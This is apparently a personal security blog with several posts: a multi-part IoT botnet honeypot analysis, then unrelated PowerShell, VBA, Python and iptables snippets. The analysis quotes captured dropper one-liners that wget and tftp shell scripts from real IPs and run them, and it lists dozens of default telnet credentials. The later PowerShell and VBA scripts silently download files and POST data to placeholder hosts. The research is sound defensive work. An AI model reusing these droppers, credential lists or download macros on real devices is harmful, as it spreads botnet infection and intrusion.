Thursday, November 24, 2016

IoT Malware Analysis - CnC Server - Part 3

Using the strings gathered from inside the binaries, I began searching Google for the unique ones.  One of the unique strings that I searched for was "HTTPFLOOD GHP".  This pulled back fewer than 10 results, and the first one was from the site hxxp://psbdmp.com/wT1htV9b.  That paste contained the source code for what they called "Palkia Server.c".


This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste.  I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.

After reading the source code, understanding its logic, and verifying there were no backdoors or other attempts to infect my systems, I compiled the source code on a temporary server.  Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.


After you specify the port and the number of threads, it begins listening for clients.  When a bot connects, the first command the server sends it is one that enables scanning of other devices over telnet.


The server then keeps in contact with the bot by sending the string "PING" every 60 seconds.  I have noticed that some bots receive this keepalive at an interval as short as 15 seconds.


From the source code you also learn that the bot can send commands back to the server, which the server interprets.


From the source code you can see 3 commands that the bot can send back: PING, REPORT, and PONG.  If the bot sends PING, the CnC server responds with PONG.  If the bot sends "REPORT " followed by up to 2048 characters, the server stores the sent information in a file called telnet.txt.  If PONG is sent, the server does nothing and continues in the loop.  Anything sent to the CnC that does not match these 3 commands is printed to stdout on the CnC server, prefixed with "buf:".
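To make the keepalive and command handling concrete, here is an added example (my own code, not the Palkia source and not the author's botEmulator) that classifies bot-to-server lines the way the CnC does and flags a captured stream whose server PINGs arrive at the 60 second (or 15 second) cadence described above.  The session data is constructed, and the 'S>B'/'B>S' direction labels are my convention.

```python
import statistics
from collections import Counter

# Bot -> server handling as described for the leaked Palkia CnC source:
# PING is answered with PONG, "REPORT <data>" (up to 2048 characters) is
# written to telnet.txt, PONG is ignored, anything else is printed as "buf:<line>".
REPORT_MAX = 2048


def classify(payload):
    """Map one bot->server line onto the command the CnC would recognise."""
    line = payload.rstrip("\r\n")
    if line == "PING":
        return "PING"
    if line == "PONG":
        return "PONG"
    if line.startswith("REPORT "):
        return "REPORT"
    return "UNKNOWN"          # the CnC would echo this to stdout as "buf:<line>"


def report_body(payload):
    """Data the CnC would store in telnet.txt for a REPORT line (2048-char cap)."""
    line = payload.rstrip("\r\n")
    if not line.startswith("REPORT "):
        return None
    return line[len("REPORT "):][:REPORT_MAX]


def summarize_session(events):
    """Summarise one bot<->CnC TCP stream.

    events: list of (timestamp_seconds, direction, payload); direction is
    'S>B' (server to bot) or 'B>S' (bot to server), one record per line sent.
    """
    bot_cmds = Counter()
    server_pings = []
    for ts, direction, payload in events:
        if direction == "B>S":
            bot_cmds[classify(payload)] += 1
        elif direction == "S>B" and payload.rstrip("\r\n") == "PING":
            server_pings.append(ts)
    gaps = [b - a for a, b in zip(server_pings, server_pings[1:])]
    return {
        "bot_cmds": dict(bot_cmds),
        "ping_count": len(server_pings),
        "ping_interval": statistics.median(gaps) if gaps else None,
    }


def looks_like_palkia_keepalive(summary, tolerance=2.0):
    """Periodic server PINGs at ~60s (or the ~15s seen on some bots) answered with PONG."""
    interval = summary["ping_interval"]
    if interval is None or summary["ping_count"] < 3:
        return False
    periodic = any(abs(interval - expected) <= tolerance for expected in (60, 15))
    # Allow one unanswered PING (e.g. the capture ended before the last reply).
    answered = summary["bot_cmds"].get("PONG", 0) >= summary["ping_count"] - 1
    return periodic and answered


# Constructed sample stream (not a real capture): the server enables scanning,
# then PINGs every 60s; the bot answers PONG, sends one REPORT and one junk line.
SAMPLE_SESSION = [
    (0.0,   "S>B", "SCANNER ON\n"),
    (60.1,  "S>B", "PING\n"),
    (60.2,  "B>S", "PONG\n"),
    (120.0, "S>B", "PING\n"),
    (120.1, "B>S", "PONG\n"),
    (150.0, "B>S", "REPORT scan-result-data\n"),
    (180.2, "S>B", "PING\n"),
    (180.3, "B>S", "PONG\n"),
    (200.0, "B>S", "garbage\n"),
]

if __name__ == "__main__":
    summary = summarize_session(SAMPLE_SESSION)
    print(summary)
    print("Palkia-style keepalive:", looks_like_palkia_keepalive(summary))
```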

The other side of this source code runs an administration console so the bots can be controlled.  You can see in the source code that this console listens on port 777 by default.


It appears that if you connect to this port you are prompted for a username.  The username and then the password are parsed out of a file called savage.txt.  Each line is formatted as the username, a space, and then the password.


I created this file with a test user and a test2 user, each followed by its password.  Once I felt I understood the logic of the application, I compiled it and ran it on a temporary server.  This allowed me to connect with a username and password.  From the source code you learn that you can send the command "!* HELP", which displays a quick help screen as shown below.



From the above screenshot you can see that the Attack Commands instruct the bots to conduct UDP, TCP or HTTP floods.  KILLATTK instructs the bots to stop the attacks they were told to conduct.  Whatever someone types into the CnC server is broadcast to the bots, with the exception of a few commands.

As commands are executed on the administration side of the server they are saved to a file called server.log.

I have placed the source code for the palkia server on my github page for further research along with the telnet emulator and a botEmulator.

Have a Happy Thanksgiving! Enjoy the Turkey!!


Wednesday, November 16, 2016

IoT Malware Analysis - Observations and Statistics - Part 2

In the previous post I utilized a python program to emulate a telnet server, captured the commands that were sent to it, and then used those commands to research the binaries that were collected.

In this post I am going to provide information on what happened when 2 of my servers became infected with the malware, statistics on the username and password combinations used, and statistics on which IP Addresses I observed most often attempting to log in to my telnet server.

The Mirai botnet gained its notoriety from causing Distributed Denial of Service (DDoS) attacks.  This is exactly what happened with both of my honeypot servers that were infected.


As you can see in the above screenshot, upon initial infection of the server you see the command "SCANNER ON".  This command causes the infected device to begin scanning random IP Addresses to see if port 23 is open.  If a device can be reached over port 23, a basic script logs in and sends 3-4 commands, and those commands cause the device to become infected as described in the previous post.

After a short period of time the infected server stopped scanning, and I observed the following commands come from 2 different honeypots that were infected:




The first instance sent traffic to 107.178.255.126 over UDP to port 80.  The second instance sent traffic to 72.193.246.62 over UDP to port 3074.  In the first command you will notice the number 65500.  As you can see in the image below, it filled the packets with 65,500 random ASCII characters and sent them to the receiving IP.



In the second instance you will notice a 0.  This sent empty packets to the IP address.

In both instances where the infected servers were utilized, I rebooted them as soon as I observed them participating in a denial of service attack; even so, that still provided me with almost 4 GB of pcap data.  To take a quick tangent, I utilized tshark to carve up the pcap files.  Below are a few commands that I used:

1. "tshark -r output.pcap -T fields -e ip.src -e ip.dst -e tcp.dstport | sort | uniq -c | sort -n > freq_analysis.txt" - This command reads the source IP Address, destination IP Address and destination port of each packet, sorts them, collapses duplicates into a count of occurrences, and then sorts by that count numerically.

2. "editcap -r read.pcap output.pcap 500-1000" - Due to the massive amount of traffic generated while the host participated in a denial of service, I utilized editcap to pull packets 500-1000 out of the pcap.  This gave me a sample of the packets being sent to the target of the denial of service.
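As an added example (my own code, not one of the author's commands), the following Python reproduces the frequency analysis of command 1 in a script and flags flows that match the two floods described above (max-size and empty UDP datagrams).  It assumes the tshark fields were exported as ip.src, ip.dst, udp.dstport and udp.length, a UDP variant of command 1, and the sample output is constructed from RFC 5737 documentation addresses.

```python
from collections import Counter, defaultdict

UDP_HEADER_LEN = 8


def parse_tshark_fields(text):
    """Parse `tshark -T fields` output (one packet per line, tab-separated).

    Assumed field order: -e ip.src -e ip.dst -e udp.dstport -e udp.length
    Returns (src, dst, dport, udp_payload_len) per UDP packet.
    """
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) < 4 or not parts[0] or not parts[2]:
            continue                      # non-IP or non-UDP frame: fields empty
        src, dst, dport, ulen = parts[:4]
        payload_len = max(int(ulen) - UDP_HEADER_LEN, 0)
        rows.append((src, dst, int(dport), payload_len))
    return rows


def flow_counts(rows):
    """Same result as `sort | uniq -c | sort -n` over (src, dst, dport)."""
    counts = Counter((src, dst, dport) for src, dst, dport, _ in rows)
    return sorted(counts.items(), key=lambda item: (item[1], item[0]))


def flag_floods(rows, min_packets=5):
    """Flag flows that look like the floods observed from the honeypots: many
    datagrams from one source to one destination port, all of them either
    filled to ~65500 bytes or carrying no payload at all."""
    sizes = defaultdict(list)
    for src, dst, dport, plen in rows:
        sizes[(src, dst, dport)].append(plen)
    floods = []
    for flow, lens in sizes.items():
        if len(lens) < min_packets:
            continue
        if all(l == 0 for l in lens):
            kind = "empty-udp"            # the "0" variant of the command
        elif min(lens) >= 65000:
            kind = "max-size-udp"         # the "65500" variant of the command
        else:
            continue
        floods.append({"flow": flow, "packets": len(lens), "kind": kind})
    return sorted(floods, key=lambda f: -f["packets"])


# Constructed sample (RFC 5737 addresses, not real capture data): honeypot
# 192.0.2.10 floods 198.51.100.5:80 with 65500-byte datagrams and
# 198.51.100.6:3074 with empty ones; the two DNS packets are normal traffic.
SAMPLE_TSHARK_OUTPUT = "\n".join(
    ["192.0.2.10\t198.51.100.5\t80\t65508"] * 6
    + ["192.0.2.10\t198.51.100.6\t3074\t8"] * 5
    + ["192.0.2.10\t192.0.2.1\t53\t40", "192.0.2.1\t192.0.2.10\t40123\t56"]
    + ["\t\t\t"]                          # an ARP frame leaves every field empty
)

if __name__ == "__main__":
    rows = parse_tshark_fields(SAMPLE_TSHARK_OUTPUT)
    for flow, count in flow_counts(rows):
        print("%7d %s -> %s:%d" % (count, flow[0], flow[1], flow[2]))
    for flood in flag_floods(rows):
        print("FLOOD", flood)
```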

I do publicly apologize to the 2 IP Addresses that were targeted from my honeypot.  I tried to shut down the execution of the denial of service attack as soon as I observed it occurring.

Below are the usernames and passwords that I observed logging into my honeypot.  The first number is how many times the combination of the username and password appeared in the logs of my honeypot:

9637 root:xc3511
9567 root:vizxv
8532 root:admin
7897 admin:admin
6856 root:888888
5569 root:xmhdipc
5341 root:juantech
4927 support:support
4598 root:default
4393 root:
4321 root:anko
4268 root:123456
4100 root:54321
3668 root:root
3655 admin:password
3523 root:12345
2835 admin:
2822 admin:smcadmin
2730 admin:admin1234
2680 root:pass
2642 user:user
2476 root:hi3518
2367 root:1111
2208 root:password
2055 admin:1111
2022 root:666666
1742 root:1234
1538 guest:12345
1247 root:hunt5759
1230 root:GM8182
1201 root:dreambox
1201 root:7ujMko0vizxv
1118 admin:pass
1107 root:00000000
1102 root:Zte521
1089 root:klv1234
1088 service:service
1073 administrator:1234
1069 admin:54321
1062 root:jvbzd
1005 root:klv123
1001 admin:meinsm
991 supervisor:supervisor
987 ubnt:ubnt
967 root:7ujMko0admin
939 root:ikwb
916 admin:1111111
897 tech:tech
896 admin:4321
895 root:zlxx.
882 admin1:password
875 888888:888888
866 guest:guest
864 Administrator:meinsm
859 root:realtek
843 root:user
839 admin:1234
834 admin:123456
829 666666:666666
817 root:system
811 admin:12345
783 admin:7ujMko0admin
439 root:1001chin
357 user:qweasdzx
331 netgear:netgear
185 root:zlxx
169 admin:cat1029
168 realtek:realtek
150 telnet:telnet
98 root:5up
95 root:telnet
33 root:tl789
31 Admin:1234
23 cisco:cisco
19 root:admin@mymifi

Here are the most frequent IP Addresses and how many times a particular IP Address appeared in the logs:


I have collected a log entry from 2,654 IP Addresses so far in my research.  Understanding that some of these IP Addresses are dynamic and the party using an IP changes frequently, I found that 758 of them were listening on port 23.  I found it interesting that only 28.56% of the IP Addresses were listening on port 23; I would have expected this number to be above 60% of the scanned devices.  I also found it interesting that some of the IP Addresses that most frequently hit my honeypot were not listening on port 23.

I also conducted a host lookup on the 2,654 IP Addresses to see if they resolved to a reverse DNS name, using the command "host <ip address>":
1578 - Resolved to a reverse DNS name
807 - NXDOMAIN
144 - SERVFAIL
73 - Directed to localhost (Blackholed)
52 - DNS connection timed out


Tuesday, November 8, 2016

IoT Malware Analysis - Botnets being created through weak credentials... - Part 1

I became curious about IoT malware spreading through default usernames and passwords after reading multiple media articles.  So I spun up a VPS server and started using a tool created by Robert David Graham called telnetlogger.  Immediately I saw the constant barrage of traffic that was being generated.  The next question I had was what commands were being executed on these IoT devices.

I first evaluated the source code provided on the Github site for telnetlogger to see if I wanted to rewrite some of it to log the commands being sent in.  I then searched around for a honeypot that would emulate a telnet server.  In the end I decided to write my own in python.  It is not perfect, but it accomplishes logging up to 9 commands after a successful login.  The source code can be found on my github page.

After running this telnet emulator for less than 48 hours I had logged some interesting commands that tried to download a shell script, which would then pull down additional binaries that would be executed and then removed.  Below are some of the commands observed in the log file called outputInfo.txt.


IP:('223.96.148.28', 61232)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.102.56.200/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 94.102.56.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 94.102.56.200; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh

IP:('24.105.255.153', 48191)|U:|P:|C:cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://173.208.196.202/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 173.208.196.202;sh bin2.sh;busybox tftp -c 173.208.196.202 get bin3.sh;sh bin3.sh;busybox ftpget 173.208.196.202 bin4;sh bin4.sh;exit

IP:('27.188.253.77', 6057)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.142.236.215/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.142.236.215 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.142.236.215; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.142.236.215 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
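An added example (my own code, not the author's telnet emulator) that parses the outputInfo.txt line format above and pulls the download hosts and file names out of the wget, tftp and ftpget segments, giving a defender the distribution servers to block or hunt for in egress logs.  The three log lines are the ones shown above, embedded as sample input; the field names in the returned records are my own.

```python
import re

# One outputInfo.txt line: IP:('<src>', <port>)|U:<user>|P:<password>|C:<command>
LOG_LINE = re.compile(
    r"^IP:\('(?P<ip>[^']+)',\s*(?P<port>\d+)\)\|U:(?P<user>[^|]*)"
    r"\|P:(?P<pw>[^|]*)\|C:(?P<cmd>.*)$"
)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# The one-liners chain commands with ";", "||" and "&&"
SEGMENT_SPLIT = re.compile(r"\s*(?:;|\|\||&&)\s*")


def _after(toks, key):
    """Token following `key`, or None if `key` is last."""
    i = toks.index(key) + 1
    return toks[i] if i < len(toks) else None


def parse_fetch(segment):
    """Return (tool, host, remote_file) if the shell segment downloads something.

    Handles the busybox forms seen in the log: `wget URL`, `tftp HOST -c get FILE`,
    `tftp -c HOST get FILE`, `tftp -r FILE -g HOST` and `ftpget [opts] HOST FILE`.
    """
    toks = segment.split()
    if toks and toks[0] == "busybox":
        toks = toks[1:]
    if not toks:
        return None
    tool = toks[0]
    if tool == "wget":
        url = next((t for t in toks[1:] if t.startswith("http")), None)
        if url:
            return (tool, url.split("/")[2], url.rsplit("/", 1)[-1])
    elif tool == "tftp":
        if "-g" in toks and "-r" in toks:
            host, fname = _after(toks, "-g"), _after(toks, "-r")
        elif "get" in toks:
            host = next((t for t in toks if IPV4.fullmatch(t)), None)
            fname = _after(toks, "get")
        else:
            host = fname = None
        if host and fname:
            return (tool, host, fname)
    elif tool == "ftpget":
        rest, i = [], 1
        while i < len(toks):              # -u/-p/-P take a value, -v does not
            if toks[i] in ("-u", "-p", "-P"):
                i += 2
                continue
            if not toks[i].startswith("-"):
                rest.append(toks[i])
            i += 1
        if len(rest) >= 2:
            return (tool, rest[0], rest[1])
    return None


def parse_log(text):
    """Parse outputInfo.txt-style lines into records with the fetches they contain."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        fetches = [f for f in map(parse_fetch, SEGMENT_SPLIT.split(m.group("cmd"))) if f]
        records.append({
            "source": m.group("ip"),
            "user": m.group("user"),
            "password": m.group("pw"),
            "fetches": fetches,
            "hosts": sorted({host for _, host, _ in fetches}),
        })
    return records


def dropper_hosts(records):
    """Union of all download hosts across the log: the IoCs to block or hunt for."""
    return {host for rec in records for host in rec["hosts"]}


# Sample input: the three log lines quoted in the post above.
SAMPLE_LOG = """
IP:('223.96.148.28', 61232)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.102.56.200/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 94.102.56.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 94.102.56.200; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
IP:('24.105.255.153', 48191)|U:|P:|C:cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://173.208.196.202/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 173.208.196.202;sh bin2.sh;busybox tftp -c 173.208.196.202 get bin3.sh;sh bin3.sh;busybox ftpget 173.208.196.202 bin4;sh bin4.sh;exit
IP:('27.188.253.77', 6057)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.142.236.215/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.142.236.215 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.142.236.215; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.142.236.215 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
"""

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for rec in recs:
        print(rec["source"], rec["hosts"], [f[2] for f in rec["fetches"]])
    print("dropper hosts:", sorted(dropper_hosts(recs)))
```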


After pulling down the shell script with the wget command, you can see the commands below being executed in a bash script.


As you can see, it utilizes wget to download files whose names make them appear to be legitimate binaries that could be running on a linux server.  I also like the trick of using a space as a filename to hide its presence.  It then executes each binary and removes it if the script executed successfully.

I was curious why so many files were being downloaded and executed versus just having a couple.  I then used the Linux program "file" to identify each file.  As you can see below, each file is built for a different architecture.  "Leave no device behind..."



ELF 32-bit LSB  executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, ARM, version 1, statically linked, not stripped
ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, Motorola 68020 - invalid byte order, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, SPARC version 1 (SYSV), statically linked, not stripped
ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), statically linked, not stripped



Using a utility called ssdeep you can see that most of this malware is similar, but if you evaluate the SHA1 hashes of the files across the more than 13 samples collected, most of them are different.  Running strings on any of the binaries you can see the following:

This is an IP Address and port that has not been obfuscated.  It turns out to be the address and port of the CnC server that the bot connects to.  The parent registry of each IP Address is also listed.  After identifying this pattern, the command below could be executed to find the CnC server address and port in all of the binaries.  I will continue to update the results as more CnC servers are found.



strings * | egrep -e "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}" | sort | uniq -c | sort -nr



The command returned the number of occurrences among the binaries I had collected, along with the CnC IP Address and port.  I was curious what communication channel would be used if the binary was executed.

With one of the x86 binaries I spun up another VPS and executed the binary while running tcpdump.  I was expecting to observe in the packet captures a connection to an IRC channel; however, it connected using more of a raw connection.  I saw this behavior after infecting a couple of the VPS servers with the malware.

This is just a quick initial analysis of how the malware is spreading, propagating, executing, and communicating with its CnC servers.  The infected devices are obviously being utilized to cause DDoS attacks and whatever other activities the miscreants wish.  Also, with the variety of hashes across each unique variant, a traditional signature-based solution would be ineffective at filtering this activity.  More to come, but I will wrap this up...

The information contained in this post is for educational purposes.  Enjoy...



Tuesday, October 18, 2016

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts: one to download and save a file, and one to send a POST request to a site.  Below are the scripts that I created.

# Script 1 - download a text file and save it under %APPDATA%\Microsoft
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")
# Go through the system proxy (with the current user's credentials) if one is configured
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$response = $wc.DownloadString("http://blah.com/master.txt")
Set-Content -Value $response -Path "$env:APPDATA\Microsoft\output.txt"

---

# Script 2 - POST form data to a page every 10 minutes, 50 times, saving each response
# The original script never defined $url; the value below is a placeholder for the page that accepts the POST
$url = "http://blah.com/post.php"
$encodedData = "b3V0Ym91bmQ%3d"   # URL-encoded base64 string sent in the 'content' field

$params = New-Object System.Collections.Specialized.NameValueCollection
$params.Add('poster','blah55')
$params.Add('syntax','text')
$params.Add('content',$encodedData)

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

for ($i=1; $i -le 50; $i++)
{
    # UploadValues returns the response body as a byte array
    $response = $wc.UploadValues($url, "POST", $params)
    $decoded = [System.Text.Encoding]::UTF8.GetString($response)
    Set-Content -Value $decoded -Path "$env:APPDATA\Microsoft\post.txt"
    Start-Sleep -Seconds 600
}

VBA - Script to Download a file from a URL

Below is a Visual Basic for Applications script I quickly built to download a file to the computer through a Macro.  This was to test the capability of doing it and to find a way to prevent it from occurring.

Sub dFile()
'
' vTest Macro - download a file over HTTP and save it under %AppData%\microsoft
'
Dim dURL As String
Dim WinHttpReq As Object
Dim oStream As Object
Dim fileName As String

dURL = "http://blah/text.zip"
fileName = Environ("AppData") & "\microsoft\text.zip"

Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
' Third argument False = synchronous, so .Status is valid right after .send
WinHttpReq.Open "GET", dURL, False
WinHttpReq.send

If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1                    ' adTypeBinary
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile fileName, 2      ' adSaveCreateOverWrite
    oStream.Close
End If

End Sub

Python - Script to Send an Email through Gmail

Below is a python script that I was using to send an email through a gmail account:

#!/usr/bin/python

import smtplib
from email.mime.text import MIMEText

fromAddress = 'email@gmail.com'
toAddress = 'ltrappett@gmail.com'

# Build a proper message so the recipient sees a sender, recipient and subject
msg = MIMEText('To another email address.')
msg['From'] = fromAddress
msg['To'] = toAddress
msg['Subject'] = 'Test'

username = 'email@gmail.com'
password = 'specific use password'   # an app-specific password, not the account password

server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()                    # upgrade to TLS before sending credentials
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()

iptables - Setup for a home router with 3 vlans

I began to create a home router with 2 NICs.  The first NIC is for the WAN and the second NIC is for the LAN.  The LAN NIC is then split into 3 vlans: the first for a Wireless LAN, the second for the Wired LAN and the third for an Untrusted Network for testing and whatever else.  The LAN NIC plugs into a switch that is also VLANed accordingly.  My purpose in posting it is to show how it could be done; understand that it is probably not without bugs.

The main reason I am creating the 3 vlans is to separate out and monitor the IoT devices that are starting to accumulate in my house and separate my testing lab from everything else due to the malware that I sometimes will detonate in it.

Below is the configuration of the /etc/network/interfaces file to establish the vlans.  After that configuration is what I started with to build out iptables for each environment.  I am also running a caching bind9 server and plan to set up squid as a transparent web proxy.  I intend to feed the logs that are generated into a SIEM.  I am debating between AlienVault OSSIM, Splunk Light, ELK or one of many others...

## /etc/network/interfaces ##
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.20.5.254
netmask 255.255.255.0
network 172.20.5.0
broadcast 172.20.5.255
gateway 172.20.5.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 172.20.5.1
dns-search thepcn3rd.local

# Native Network
auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0
network 10.0.0.0
broadcast 10.0.0.255
dns-nameservers 10.0.0.1
dns-search my.local

# Wireless Network
auto eth1.10
iface eth1.10 inet static
address 10.10.0.1
netmask 255.255.255.0
network 10.10.0.0
broadcast 10.10.0.255
dns-nameservers 10.10.0.1
dns-search wireless.local
vlan-raw-device eth1

# Wired Network
auto eth1.20
iface eth1.20 inet static
address 10.20.0.1
netmask 255.255.255.0
network 10.20.0.0
broadcast 10.20.0.255
dns-nameservers 10.20.0.1
dns-search wired.local
vlan-raw-device eth1

# Untrusted Network
auto eth1.30
iface eth1.30 inet static
address 10.30.0.1
netmask 255.255.255.0
network 10.30.0.0
broadcast 10.30.0.255
dns-nameservers 10.30.0.1
dns-search blue.local
vlan-raw-device eth1

## iptables ##
iptables -F
iptables -t nat -F
iptables -X
iptables -Z

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP

iptables -N WAN_ACCEPT
iptables -N LAN_ACCEPT
iptables -N LOG_FORWARD_ACCEPT
iptables -N WAN_OUTPUT_DROP
iptables -N LAN_OUTPUT_DROP
iptables -N WAN_INPUT_DROP
iptables -N LAN_INPUT_DROP
iptables -N FORWARD_DROP

iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

################################## Allow incoming to eth0 #####
# Comcast LAN to eth0 Router WAN
# SSH
iptables -A INPUT -i eth0 -p tcp -s 172.20.5.0/24 -d 172.20.5.254 --dport 22 -m state --state NEW,ESTABLISHED -j WAN_ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -s 172.20.5.254 -d 172.20.5.0/24 --sport 22 -m state --state ESTABLISHED -j WAN_ACCEPT

################################## Allow incoming to eth1.20 #####
# eth1.20 Wired LAN to eth0 Router LAN
# SSH TCP/22 from LAN to 10.20.0.1
iptables -A INPUT -i eth1.20 -p tcp -s 10.20.0.0/24 -d 10.20.0.1 --dport 22 -m state --state NEW,ESTABLISHED -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.20 -p tcp -s 10.20.0.1 -d 10.20.0.0/24 --sport 22 -m state --state ESTABLISHED -j LAN_ACCEPT
# DNS UDP/53 from LAN to 10.10.0.1, 10.20.0.1 and 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 53 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 53 -j LAN_ACCEPT
# DHCP UDP/67 from LAN to 10.10.0.1, 10.20.0.1, 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 67 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 67 -j LAN_ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Forward eth1.10 to eth0 and back
iptables -A FORWARD -i eth1.10 -o eth0 -p udp -s 10.10.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p udp -d 10.10.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.20 to eth0 and back
iptables -A FORWARD -i eth1.20 -o eth0 -p udp -s 10.20.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p udp -d 10.20.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
